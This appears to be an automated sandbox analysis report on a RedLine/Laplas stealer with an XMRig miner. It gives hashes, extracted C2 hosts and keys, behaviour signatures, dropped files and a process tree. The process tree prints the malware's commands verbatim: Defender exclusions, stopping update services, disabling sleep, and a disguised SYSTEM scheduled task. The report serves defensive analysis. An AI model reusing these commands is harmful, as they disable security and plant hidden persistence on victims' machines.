Analysis

  • max time kernel
    299s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-07-2023 00:14

General

  • Target

    1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe

  • Size

    2.3MB

  • MD5

    3c55617e6b69330386a0350e9f6aa0b4

  • SHA1

    99bff391433cfc610b27f3b2b7ebc3239314f831

  • SHA256

    1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94

  • SHA512

    46eac86da241ab7b98d449e31111c9da154109b493bf62e807cffcdb43767167c994a165d78ec9a4ce24ea4f64ec76edee39daf9408bad3d6e65b64b1b6b1c28

  • SSDEEP

    49152:X4MR20Q9Xz2p2pizrXPHaBXtHqNQ6cBUX0biao10PzFyPawde5Gir:X41MEpyHaZUNFcBUEfoIgPFTir

Malware Config

Extracted

Family

redline

Botnet

120723_rc_11

C2

rcam.tuktuk.ug:11290

Attributes
  • auth_value

    3a7b4b38a7116be1f337083fb37de790

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Themida packer 23 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3292
      • C:\Users\Admin\AppData\Local\Temp\1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe
        "C:\Users\Admin\AppData\Local\Temp\1ca6070d9a141d51ccc4f75ab90095cc7fa3791c54ec10ee042b96a815822c94.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          3⤵
            PID:5008
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            3⤵
              PID:4812
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              3⤵
                PID:5012
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3140
                • C:\Users\Admin\AppData\Local\Temp\Octium.exe
                  "C:\Users\Admin\AppData\Local\Temp\Octium.exe"
                  4⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of WriteProcessMemory
                  PID:196
                  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                    5⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:3592
                • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe
                  "C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"
                  4⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Drops file in Drivers directory
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4972
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4120
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3032
              • C:\Windows\System32\sc.exe
                sc stop UsoSvc
                3⤵
                • Launches sc.exe
                PID:3944
              • C:\Windows\System32\sc.exe
                sc stop WaaSMedicSvc
                3⤵
                • Launches sc.exe
                PID:3472
              • C:\Windows\System32\sc.exe
                sc stop wuauserv
                3⤵
                • Launches sc.exe
                PID:4676
              • C:\Windows\System32\sc.exe
                sc stop bits
                3⤵
                • Launches sc.exe
                PID:5028
              • C:\Windows\System32\sc.exe
                sc stop dosvc
                3⤵
                • Launches sc.exe
                PID:5060
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4524
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\System32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2964
              • C:\Windows\System32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:676
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4664
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4308
            • C:\Windows\System32\schtasks.exe
              C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
              2⤵
                PID:492
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                PID:4324
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2416
                • C:\Windows\System32\sc.exe
                  sc stop wuauserv
                  3⤵
                  • Launches sc.exe
                  PID:1564
                • C:\Windows\System32\sc.exe
                  sc stop dosvc
                  3⤵
                  • Launches sc.exe
                  PID:4460
                • C:\Windows\System32\sc.exe
                  sc stop bits
                  3⤵
                  • Launches sc.exe
                  PID:4576
                • C:\Windows\System32\sc.exe
                  sc stop WaaSMedicSvc
                  3⤵
                  • Launches sc.exe
                  PID:1408
                • C:\Windows\System32\sc.exe
                  sc stop UsoSvc
                  3⤵
                  • Launches sc.exe
                  PID:2116
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2796
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                    PID:4296
                  • C:\Windows\System32\powercfg.exe
                    powercfg /x -hibernate-timeout-dc 0
                    3⤵
                      PID:2132
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                        PID:4764
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -standby-timeout-dc 0
                        3⤵
                          PID:1100
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                        2⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4596
                      • C:\Windows\System32\conhost.exe
                        C:\Windows\System32\conhost.exe
                        2⤵
                          PID:2708
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4088
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        1⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Drops file in Drivers directory
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:3716

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        12.5MB

                        MD5

                        8dbc96129e97e6f44fe615670544f915

                        SHA1

                        8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

                        SHA256

                        0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

                        SHA512

                        63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        12.5MB

                        MD5

                        8dbc96129e97e6f44fe615670544f915

                        SHA1

                        8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

                        SHA256

                        0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

                        SHA512

                        63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        ad5cd538ca58cb28ede39c108acb5785

                        SHA1

                        1ae910026f3dbe90ed025e9e96ead2b5399be877

                        SHA256

                        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                        SHA512

                        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        8d90b0d9e153d0970856fb6cee3f5766

                        SHA1

                        d31a83aa9c0a563be2fe641869f65e3c6813dbad

                        SHA256

                        cc54aa1d8729111f25fb1466e1643b986444c67af610d6de90ae41b0455af364

                        SHA512

                        a4356dd832b7c4d355fbb25caf206dee20dda91b131f06008e68829e2902be76370000cce1ee5374d5be3e906e1249ce3d3b02f826b21465eb4567784589eb83

                      • C:\Users\Admin\AppData\Local\Temp\Octium.exe

                        Filesize

                        4.2MB

                        MD5

                        f206c33258de47d5e05e9f035efc265c

                        SHA1

                        c744ea5b001dc4a9b1e16dd736f44d0d3e9be002

                        SHA256

                        298bdf9042629b42e761f52949926d52acd55239181021fd78040bff32678e4a

                        SHA512

                        ef249fcb285fd3741e538a76ace582cdfa6042b2f559fa95a8a0245c7a09e3cf675150c1fd42f50383790b553a578c06cd898ef915ebf85e2cc6aab24ea3f90a

                      • C:\Users\Admin\AppData\Local\Temp\Octium.exe

                        Filesize

                        4.2MB

                        MD5

                        f206c33258de47d5e05e9f035efc265c

                        SHA1

                        c744ea5b001dc4a9b1e16dd736f44d0d3e9be002

                        SHA256

                        298bdf9042629b42e761f52949926d52acd55239181021fd78040bff32678e4a

                        SHA512

                        ef249fcb285fd3741e538a76ace582cdfa6042b2f559fa95a8a0245c7a09e3cf675150c1fd42f50383790b553a578c06cd898ef915ebf85e2cc6aab24ea3f90a

                      • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

                        Filesize

                        12.5MB

                        MD5

                        8dbc96129e97e6f44fe615670544f915

                        SHA1

                        8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

                        SHA256

                        0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

                        SHA512

                        63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

                      • C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe

                        Filesize

                        12.5MB

                        MD5

                        8dbc96129e97e6f44fe615670544f915

                        SHA1

                        8b93742b542ea62e08ff1e78e9f5cf8d53d4a57a

                        SHA256

                        0cd34919fdb6f1b491d68f0702444567f77bb2afeb13a6d834cab12ea8b5c683

                        SHA512

                        63363bb30aa06ce40b7c0d72991ded014823b9f427e8439e6d20064aa533659eb0d31de955ee3d511de7e3c2c7d67269f7072b1f6a2f0aa19c5fa2a64180ef7a

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pszmsvqp.351.ps1

                        Filesize

                        1B

                        MD5

                        c4ca4238a0b923820dcc509a6f75849b

                        SHA1

                        356a192b7913b04c54574d18c28d46e6395428ab

                        SHA256

                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                        SHA512

                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                      • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

                        Filesize

                        833.2MB

                        MD5

                        3e390d934857d23b13ec44b59af98856

                        SHA1

                        0c6135f74d4f56ee9d803c4935bd2d68ca106ae1

                        SHA256

                        195f807aa8446bb89d236a56a0673081b3c15e9b65da4893129ced374d9c7daf

                        SHA512

                        7c714988433352b65751effeca5923bdbc984b2218be4a958224802db74780f1df5625d8a4c313c0fa02469a7991ad3c6020b42c48eee2cc73653ba0fa2ee6e7

                      • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

                        Filesize

                        833.2MB

                        MD5

                        3e390d934857d23b13ec44b59af98856

                        SHA1

                        0c6135f74d4f56ee9d803c4935bd2d68ca106ae1

                        SHA256

                        195f807aa8446bb89d236a56a0673081b3c15e9b65da4893129ced374d9c7daf

                        SHA512

                        7c714988433352b65751effeca5923bdbc984b2218be4a958224802db74780f1df5625d8a4c313c0fa02469a7991ad3c6020b42c48eee2cc73653ba0fa2ee6e7

                      • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

                        Filesize

                        833.2MB

                        MD5

                        3e390d934857d23b13ec44b59af98856

                        SHA1

                        0c6135f74d4f56ee9d803c4935bd2d68ca106ae1

                        SHA256

                        195f807aa8446bb89d236a56a0673081b3c15e9b65da4893129ced374d9c7daf

                        SHA512

                        7c714988433352b65751effeca5923bdbc984b2218be4a958224802db74780f1df5625d8a4c313c0fa02469a7991ad3c6020b42c48eee2cc73653ba0fa2ee6e7

                      • C:\Windows\System32\drivers\etc\hosts

                        Filesize

                        3KB

                        MD5

                        00930b40cba79465b7a38ed0449d1449

                        SHA1

                        4b25a89ee28b20ba162f23772ddaf017669092a5

                        SHA256

                        eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                        SHA512

                        cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        811d351aabd7b708fef7683cf5e29e15

                        SHA1

                        06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                        SHA256

                        0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                        SHA512

                        702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Filesize

                        10KB

                        MD5

                        46dd239c95c8186b5347a900ce231eae

                        SHA1

                        733674325a8ad34a0147479f0510bd8bc824e879

                        SHA256

                        e9abb69b1483c5e1c26d6fb755cd7147b885154a653e188f34401930d89c4116

                        SHA512

                        41ce13eee4ae7a3475e220ed224d44f2e6b03eedaea52a6119e5ebbc6751734a03cf059b94b24e052358166dca34a3a6890b626313f4b24b1d517057919941b6

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        631f4b3792b263fdda6b265e93be4747

                        SHA1

                        1d6916097d419198bfdf78530d59d0d9f3e12d45

                        SHA256

                        4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

                        SHA512

                        e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

                      • memory/196-576-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-579-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-580-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-601-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-575-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-605-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-603-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-586-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-588-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-609-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-577-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/196-578-0x0000000000180000-0x0000000000A9D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/964-132-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-160-0x0000000000BD0000-0x0000000001138000-memory.dmp

                        Filesize

                        5.4MB

                      • memory/964-152-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-150-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-146-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-148-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-144-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-142-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-140-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-138-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-136-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-134-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-130-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-129-0x0000000004FA0000-0x0000000004FB5000-memory.dmp

                        Filesize

                        84KB

                      • memory/964-128-0x0000000004FA0000-0x0000000004FBC000-memory.dmp

                        Filesize

                        112KB

                      • memory/964-127-0x0000000000BD0000-0x0000000001138000-memory.dmp

                        Filesize

                        5.4MB

                      • memory/964-125-0x0000000005080000-0x000000000511C000-memory.dmp

                        Filesize

                        624KB

                      • memory/964-124-0x0000000000BD0000-0x0000000001138000-memory.dmp

                        Filesize

                        5.4MB

                      • memory/964-120-0x0000000000BD0000-0x0000000001138000-memory.dmp

                        Filesize

                        5.4MB

                      • memory/3140-166-0x000000000ED00000-0x000000000ED4B000-memory.dmp

                        Filesize

                        300KB

                      • memory/3140-447-0x000000000E620000-0x000000000EB4C000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/3140-446-0x000000000DF20000-0x000000000E0E2000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/3140-437-0x00000000098C0000-0x00000000098D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3140-174-0x0000000010170000-0x000000001066E000-memory.dmp

                        Filesize

                        5.0MB

                      • memory/3140-173-0x000000000F060000-0x000000000F0C6000-memory.dmp

                        Filesize

                        408KB

                      • memory/3140-172-0x000000000F100000-0x000000000F192000-memory.dmp

                        Filesize

                        584KB

                      • memory/3140-171-0x000000000EFE0000-0x000000000F056000-memory.dmp

                        Filesize

                        472KB

                      • memory/3140-165-0x00000000098C0000-0x00000000098D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3140-164-0x000000000ECB0000-0x000000000ECEE000-memory.dmp

                        Filesize

                        248KB

                      • memory/3140-163-0x000000000EC50000-0x000000000EC62000-memory.dmp

                        Filesize

                        72KB

                      • memory/3140-162-0x000000000ED60000-0x000000000EE6A000-memory.dmp

                        Filesize

                        1.0MB

                      • memory/3140-161-0x000000000F260000-0x000000000F866000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/3140-159-0x0000000007030000-0x0000000007036000-memory.dmp

                        Filesize

                        24KB

                      • memory/3140-153-0x0000000000400000-0x0000000000430000-memory.dmp

                        Filesize

                        192KB

                      • memory/3592-612-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-627-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-614-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-615-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-616-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-617-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-618-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-625-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-724-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-673-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-613-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-715-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3592-611-0x0000000001000000-0x000000000191D000-memory.dmp

                        Filesize

                        9.1MB

                      • memory/3716-1172-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/3716-737-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/3716-730-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/3716-729-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/3716-728-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/3716-727-0x00007FF6DFA40000-0x00007FF6E09E0000-memory.dmp

                        Filesize

                        15.6MB

                      • memory/4088-1202-0x0000000000800000-0x0000000000840000-memory.dmp

                        Filesize

                        256KB

                      • memory/4088-1214-0x0000000001110000-0x0000000001130000-memory.dmp

                        Filesize

                        128KB

                      • memory/4088-1218-0x0000000001110000-0x0000000001130000-memory.dmp

                        Filesize

                        128KB

                      • memory/4120-669-0x000002F0BCA10000-0x000002F0BCA20000-memory.dmp

                        Filesize

                        64KB

                      • memory/4120-665-0x000002F0BCA10000-0x000002F0BCA20000-memory.dmp

                        Filesize

                        64KB

                      • memory/4120-626-0x000002F0D50B0000-0x000002F0D50D2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4120-628-0x000002F0BCA10000-0x000002F0BCA20000-memory.dmp

                        Filesize

                        64KB

                      • memory/4120-629-0x000002F0BCA10000-0x000002F0BCA20000-memory.dmp

                        Filesize

                        64KB

                      • memory/4120-632-0x000002F0D5260000-0x000002F0D52D6000-memory.dmp

                        Filesize

                        472KB

                      • memory/4324-909-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-821-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-911-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-744-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-749-0x0000027910F00000-0x0000027910F10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-767-0x0000027929560000-0x000002792957C000-memory.dmp

                        Filesize

                        112KB

                      • memory/4324-772-0x00007FF7E86D0000-0x00007FF7E86E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4324-775-0x0000027929730000-0x00000279297E9000-memory.dmp

                        Filesize

                        740KB

